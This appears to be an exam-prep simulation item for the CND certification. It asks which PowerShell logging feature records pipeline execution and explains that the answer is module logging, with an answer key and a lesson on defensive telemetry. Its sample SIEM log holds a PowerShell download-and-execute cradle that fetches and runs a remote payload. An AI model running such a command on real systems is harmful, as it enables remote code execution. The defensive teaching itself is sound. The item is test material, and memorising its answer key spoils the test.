In this simulation, you will analyze endpoint telemetry focusing on malicious scripting activity. You will learn to identify the correct logging mechanisms required to detect Living-off-the-Land (LotL) tactics and pipeline execution across the enterprise network.

CND (312-38) Network Defense Simulation

Network Scenario

You are a Blue Team Defender managing endpoint telemetry for an MNC. Recent threat intelligence reports an increase in fileless malware attacks utilizing obfuscated PowerShell commands. The SOC requires deep visibility into dynamically generated scripts and in-memory execution. You are currently reviewing the Group Policy Objects (GPOs) applied to the Windows endpoints to ensure the SIEM receives the necessary execution steps and variable states.

Traffic & Logs

[SIEM QUERY] source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4103 DATE: 2024-05-22T09:14:33 HOSTNAME: WRK-FIN-042 USER: DOMAIN\albert.admin Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Payload: CommandInvocation(Invoke-Expression): "IEX (New-Object Net.WebClient).DownloadString('http://192.168.50.100/payload.ps1')" ParameterBinding(Invoke-Expression): name="Command"; value="Write-Host 'System Compromised'" Variable Initialization: $client = New-Object System.Net.WebClient

TELEMETRY REVIEW: The SIEM is successfully capturing Event ID 4103, which exposes the specific commands and variables dynamically processed by the PowerShell engine, bypassing static obfuscation.

Question

Albert works as a Windows system administrator at an MNC. He uses PowerShell logging to identify any suspicious scripting activity across the network. He wants to record pipeline execution details as PowerShell executes, including variable initialization and command invocations. Which PowerShell logging component records pipeline execution details as PowerShell executes?

A. Module logging

B. Script block logging

C. Event logging

D. Transcript logging

Consider the level of detail required. "Script block" logs the code itself, while "transcript" logs the console output. Which logging type specifically targets the internal engine events like the "pipeline" and "variables"?

Expert Analysis

1. What is happening in the network:
Endpoints are executing PowerShell scripts, potentially malicious ones that use "Living-off-the-Land" (LotL) techniques. To detect these, the defender is configuring advanced endpoint telemetry to forward detailed PowerShell engine events to a centralized SIEM for behavioral analysis.

2. Identify attack or behavior:
Attackers often obfuscate their scripts (e.g., base64 encoding or string manipulation) to evade static Antivirus signatures. When the script runs, the PowerShell engine must deobfuscate it to execute. Capturing pipeline execution and variable state catches the payload at its most vulnerable point—during execution.

3. Why correct answer (A) is correct:
- Module logging (Event ID 4103): This specific logging feature records pipeline execution details as PowerShell executes. It logs variable initializations, command invocations, and portions of scripts, providing a granular view of what the script is dynamically doing step-by-step.

4. Why others are wrong:
- Script block logging (Event ID 4104): While essential, it records the *entire content* of script blocks as they are executed, not the step-by-step pipeline execution or variable state. It's best for capturing the deobfuscated code block, but Module logging captures the operational flow.
- Transcript logging: Records the input and output (I/O) of a PowerShell session, identical to what a user sees on the screen. It misses background pipeline variables not sent to the console.
- Event logging: A generic term representing standard application/system logs, not a specific, granular PowerShell defensive control.

5. Defensive action:
Ensure both Turn on PowerShell Script Block Logging and Turn on PowerShell Module Logging are enabled via Active Directory Group Policy. Ensure the logs are properly sized to avoid rollover and ingested into a SIEM for alerting on suspicious cmdlets like Invoke-Expression (IEX) or System.Net.WebClient.

MINI LESSON: PowerShell Telemetry Triad
For robust defense-in-depth on Windows endpoints, enable all three core PowerShell logging types:
1. Module Logging (EID 4103): Records pipeline, command invocations, and variable states. Great for dynamic analysis.
2. Script Block Logging (EID 4104): Captures the full code of the script block. Defeats static obfuscation as code is logged right before the engine processes it.
3. Transcription Logging: Creates a text file of all terminal input and output. Great for forensic reconstruction of interactive threat actor sessions.

Ready for more challenges?

Explore more CND simulations